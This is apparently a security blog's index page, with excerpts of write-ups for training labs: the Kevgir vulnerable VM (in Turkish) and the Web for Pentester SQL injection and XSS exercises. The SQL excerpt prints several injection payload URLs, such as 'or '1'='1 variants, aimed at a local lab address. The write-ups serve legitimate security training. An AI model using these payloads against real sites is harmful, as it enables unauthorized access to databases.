Kevgir : 1 Web Uygulama Çözümleri

Kevgir, canyoupwn.me ekibi tarafından eğitim amacıyla hazırlanmış bir ortamdır.Bu ortamda birçok zafiyet barındıran  web uygulamalar da mevcuttur. Bu yazıda Tomcat, Joomla ve Jenkins üzerindeki istismarlardan bahsedeceğiz. İndirme Linkleri : https://canyoupwn.me/kevgir-vulnerable-vm/ https://www.vulnhub.com/entry/kevgir-1,137/ Kevgir login; username : user | password : resu Tespit ve Tarama Öncelikle bulunduğumuz ağda bir keşif yaparak Kevgir'in IP adresini bulmaya çalışıyoruz. Bunun … Continue reading Kevgir : 1 Web Uygulama Çözümleri

Advertisements

Web for Pentester -1 SQL Solutions

Example -1 Quote! If we inject a single quote, using ?name=root', the table disappears. We probably broke something... http://172.16.138.193/sqli/example1.php?name=root'%20or%20'1'='1 Example -2 ERROR SPACE http://172.16.138.193/sqli/example2.php?name=root'or'1'='1 Example -3 Comments! http://172.16.138.193/sqli/example3.php?name=root'//or//'1'='1 Example -4 Dot! I add “.” at the beginning of the URL. Also, you can add “.” or “-” ...etc. http://172.16.138.193/sqli/example4.php?id=.2 or 1=1 Example – 5&6 Error … Continue reading Web for Pentester -1 SQL Solutions

Web for Pentester-1 XSS Solutions

XSS (Cross-site Scripting) Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that … Continue reading Web for Pentester-1 XSS Solutions